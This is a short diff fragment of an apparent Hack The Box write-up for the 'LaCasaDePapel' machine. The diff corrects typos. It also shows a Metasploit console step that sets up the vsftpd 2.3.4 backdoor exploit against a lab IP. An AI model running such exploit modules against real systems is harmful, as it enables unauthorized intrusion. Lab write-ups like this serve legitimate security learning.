b4cksp4c3/b4cksp4c3.github.io/htb/writeups/lacasadepapel.md

    --  ----
    0   Automatic
 ```
 The only thing that we have to set is the RHOSTS.
-Running the exploit we see that the expoit completed but no sessions was created
+Running the exploit we see that the exploit completed but no session was created
 ```
 msf5 exploit(unix/ftp/vsftpd_234_backdoor) > set RHOSTS 10.10.10.131
 RHOSTS => 10.10.10.131